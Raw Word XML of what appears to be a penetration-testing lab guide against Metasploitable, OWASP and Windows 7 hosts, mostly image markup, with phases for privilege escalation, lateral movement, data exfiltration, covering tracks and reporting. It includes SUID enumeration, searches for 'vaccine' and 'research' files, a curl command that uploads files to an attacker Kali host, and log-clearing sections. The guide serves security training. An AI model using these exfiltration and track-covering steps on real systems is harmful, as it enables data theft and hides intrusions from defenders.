            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46" name="image57.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image57.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check loot folder:</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cd ~</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/.msf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4/loot</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ls -la</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cat *</w:t>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="20A71703" wp14:editId="452A9AAB">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13"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50"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Credential Harvesting (Windows)</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If you have Meterpreter on Windows 7:</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0E7C5E07" wp14:editId="542FE618">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="image42.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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lastRenderedPageBreak/>
        <w:t>Lateral Movement</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 xml:space="preserve">Scenario: Move from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to OWASP:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4C9AFF5C" wp14:editId="714341B0">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35"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52"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3C3BF1E7" wp14:editId="62BBF339">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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53"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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lastRenderedPageBreak/>
        <w:t>Privilege Escalation (Linux)</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 xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/OWASP:</w:t>
      </w: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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel 2.6 </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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5F6EB669" wp14:editId="3558B8C8">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25"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54"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3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Privilege Escalation (Windows)</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On Windows 7 Meterpreter:</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="27B593F2" wp14:editId="7BF962BB">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="image37.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PHASE 6: </w:t>
      </w:r>
      <w:r w:rsidR="00A13DDC" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DATA EXFILTRATION</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Locate Target Data</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On Linux targets:</w:t>
      </w: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find / -name "*research*" 2&gt;/dev/null</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find / -name "*vaccine*" 2&gt;/dev/null</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find / -name "*formula*" 2&gt;/dev/null</w:t>
      </w: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ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/www/html</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ls -la /opt</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ls -la /home/*/Documents</w:t>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="294DAC80" wp14:editId="23DF7B0D">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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56"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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On Windows targets (Meterpreter):</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search -f *vaccine*.docx</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search -f *research*.xlsx</w:t>
      </w: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cd C:\\Users\\Administrator\\Documents</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ls</w:t>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4F805F50" wp14:editId="0AD565BE">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17"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57"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Download Files</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From Linux shell:</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Start web server on Kali</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 xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w: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curl -X POST -F "file=@/path/to/file" http://192.168.189.66:8000</w:t>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="37ACF028" wp14:editId="008608F9">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33"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58"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3112F526" wp14:editId="3F539197">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31"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59"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="04052A95" wp14:editId="553F5452">
            <wp:extent cx="5943600" cy="3340100"/>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60"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Database Exfiltration</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On OWASP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="79929E7C" wp14:editId="08D6ECF1">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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61"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="384C90A0" wp14:editId="6C551101">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26"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62"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Simulate Cloud Exfiltration</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Create simulated AWS credential file:</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="167A4D20" wp14:editId="6CED7E8B">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32"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63"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PHASE 7: </w:t>
      </w:r>
      <w:r w:rsidR="00A13DDC" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>COVERING TRACKS</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Clear Logs (Linux)</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6E1C83FE" wp14:editId="57009DE2">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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64"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Clear Windows Event Logs (Meterpreter)</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4DB5D59F" wp14:editId="53D10B87">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44" name="image36.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PHASE 8: </w:t>
      </w:r>
      <w:r w:rsidR="00A13DDC" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOCUMENTATION &amp; REPORTING</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 xml:space="preserve">Generate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Report</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="15B420EC" wp14:editId="3A5FC045">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34"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66"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Create Attack Timeline</w:t>
      </w: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Day 1: Reconnaissance - Network scanning completed</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Day 2: Port scanning - Identified vulnerable services (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
